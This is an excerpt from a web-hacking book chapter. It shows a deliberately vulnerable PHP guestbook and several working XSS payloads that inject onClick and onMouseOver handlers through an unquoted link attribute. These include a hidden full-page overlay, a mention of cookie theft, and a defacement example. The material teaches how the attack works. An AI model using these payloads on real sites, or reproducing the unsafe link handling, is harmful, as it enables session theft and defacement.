An Event-Processing Vulnerability | Hacker Web Exploition Uncovered

From what you learned earlier, you might infer that proper filtration of the script string and < and > characters could eliminate the XSS vulnerability. However, another possibility for embedding JavaScript code allows an attacker to do without these characters . Consider an example.

http://localhost/5/4.php
<? $name=$_POST['name']; $message=$_POST['message']; $mode=$_POST['mode']; $err=""; if($mode=='add') { if(empty($name) && empty($message)) $err.="<font color=red>name and message are empty</font><br>"; elseif(empty($name)) $err.="<font color=red>name is not specified</font><br>"; elseif(empty($message)) $err.="<font color=red>message is empty</font><br>"; else { $f=fopen("4.txt", "a"); $d=date("Y-m-d H:i:s"); $message=htmlspecialchars($message); $message=preg_replace{"/\[A\=(.?)\](.?)\[\/A\]/", "<a href=\1>\2</a>", $message); $m=" <b>added ".htmlspecialchars($d).", user: ".htmlspecialchars($name)."<br></b> <i> $message </i><br><br> "; fwrite ($f, $m); fclose ($f); } } echo "<html><body> $err <center><b>guest book</b></center> "; $f=fopen("4.txt", "r"); // The file name is fixed; therefore, // tricks with the file name are impossible. while($r=fread($f, 1024)) echo $r; fclose ($f); echo "<hr> add a message:<br> <i>You can add a link to any URL using the following syntax <b>[A=http://www.yandex.ru]yandex[/a]]</b></i> <form method=POST> <input type=hidden name=mode value=add> name: <input type=text name=name><br> message:<br> <textarea name=message cols=50 rows=6></textarea><br> <input type=submit value=Add> </form> </body> </html> "; ?>

http://localhost/5/4.php

 <? $name=$_POST['name']; $message=$_POST['message']; $mode=$_POST['mode']; $err=""; if($mode=='add') {   if(empty($name) && empty($message)) $err.="<font color=red>name and message are empty</font><br>";   elseif(empty($name)) $err.="<font color=red>name is not specified</font><br>";   elseif(empty($message)) $err.="<font color=red>message is empty</font><br>";   else   {     $f=fopen("4.txt", "a");     $d=date("Y-m-d H:i:s");     $message=htmlspecialchars($message);     $message=preg_replace{"/\[A\=(.*?)\](.*?)\[\/A\]/", "<a href=\1>\2</a>", $message);     $m="     <b>added ".htmlspecialchars($d).", user: ".htmlspecialchars($name)."<br></b>     <i>     $message     </i><br><br>     ";     fwrite ($f, $m);     fclose ($f);   } } echo "<html><body> $err <center><b>guest book</b></center> "; $f=fopen("4.txt", "r"); // The file name is fixed; therefore,                         // tricks with the file name are impossible.  while($r=fread($f, 1024))    echo $r; fclose ($f); echo "<hr> add a message:<br> <i>You can add a link to any URL using the following syntax <b>[A=http://www.yandex.ru]yandex[/a]]</b></i> <form method=POST> <input type=hidden name=mode value=add> name: <input type=text name=name><br> message:<br> <textarea name=message cols=50 rows=6></textarea><br> <input type=submit value=Add> </form> </body> </html> "; ?>

As you can see, this is a modified version of http://localhost/5/1.php . However, unlike http://localhost/5/1.php , this example performs primary filtration of the entered data with the htmlspecialchars() function. In addition, this example allows users to add links to any pages using the following syntax: [A=address]text[/A] .

Check how this system responds to various characters included in messages.

Add the following message:

 Abcabc    "aa'aa<b>test</b>    [A=test]test[/A]    [A=test"test<b>dfdf dfdf 'df'] test"test<b>dfdf dfdf 'df' [/A]

Now, examine the text output by the browser and the HTML code of the page. The added message was converted into the following:

 Abcabc    &quot;aa'aa&lt;b&gt;test&lt;/b&gt;    <a href=test>test</a>    <a href=test&quot;test&lt;b&gt;dfdf dfdf 'df'>    test&quot;test&lt;b&gt;dfdf dfdf 'df' </a>

You can make a few conclusions from this: The < and > characters and quotation marks are prohibited in the message, URL, and the text of the link. However, spaces and apostrophes are allowed. The < and > characters and the quotation marks are filtered by replacing them with the sequences < , > , and " , respectively. In addition, this filtration doesn't allow you to insert the <script> tag.

However, an attacker can execute any JavaScript code he or she wishes by manipulating events of the hyperlink object. For example, add the following message and click the link:

 [A=x onClick=alert('hello');return/**/false]click me[/A]

As a result, the browser will output the following:

 <a href=x onClick=alert('hello');return/**/false>click me</a>

If you try to follow this link, the specified JavaScript code will be executed.

In this example, you cannot enclose the JavaScript code in quotation marks because they are filtered. As for apostrophes, they are already used in the JavaScript code.

So, JavaScript code shouldn't contain spaces and can contain apostrophes. To avoid spaces, the /**/ sequence is inserted, as described earlier in this chapter.

Even if apostrophes were prohibited, the attacker could encode the desired string using the string.fromCharCode() function.

Thus, when URLs and other elements of HTML tags can contain spaces and are not between quotation marks, the attacker can embed any JavaScript code he or she wishes into event handlers of an appropriate object. The attacker can use the following event handlers:

onLoad , onUnLoad A document is loaded or unloaded. These events can occur only in the <body> and <frameset> tags.
onFocus An element becomes the focus with the mouse or keyboard.
onBlur An element loses focus.
onChange An element changes its value.
onClick The user clicks an object.
onSubmit The form is submitted. This can be only in the <form> tag.
onSelect The user selects some text within a <text> or <textarea> tag. This event can be only in these tags.
onMouseOver The user moves the mouse pointer over an object.
onMouseOut The mouse pointer leaves an element.

The most interesting event from an attacker's point of view is onMouseOver . It can belong to many elements, and the malicious JavaScript code will execute as soon as a user moves the mouse pointer over the element.

For example, add the following message and move the mouse pointer over the link

 [A=x onMouseOver=alert('hello');return/**/    false]xxxxxxxxxxxxxxxxxxxx[/A]

To increase the likelihood of a user moving the mouse pointer over the link, you can make the text of the reference long enough. By declaring styles of an element, the attacker can maximize its size . As a result, the malicious JavaScript code will execute as soon as a user moves the mouse pointer over the document.

For example, the previous message can be modified as follows :

 [A=x onMouseOver=alert ('hello');return/**/    false style=z-index:1;position:absolute;top:0;left:0;width:100%;    height:100%;]xxxxxxxxxxxxxxxxxxxxxxxxx[/A]

The link will be displayed in the upper right corner of the browser window, and the layer containing the link will take up the entire page.

The layer will be transparent; therefore, the appearance of the page won't change (except for the link in the upper right corner).

If the attacker specifies an empty link, the appearance of the page won't change and the attack will be unnoticeable:

 [A=x onMouseOver=alert ('hello');return/**/false style=z-index:l;    position:absolute;top:0;left:0;width:100%;height:100%;] [/A]

As a result, when the mouse pointer moves over any part of the page, the browser will execute the JavaScript code specified by the attacker.

This vulnerability can be used to obtain a cookie of any user.

If the attacker wishes, he or she can make the layer nontransparent and embed code defacing the site, such as in the following example:

 [A=x style=z-index:1;position:absolute;top:0;left:0;width:    100%; height:100%; background-color:#ff0000;]Hacked[/A]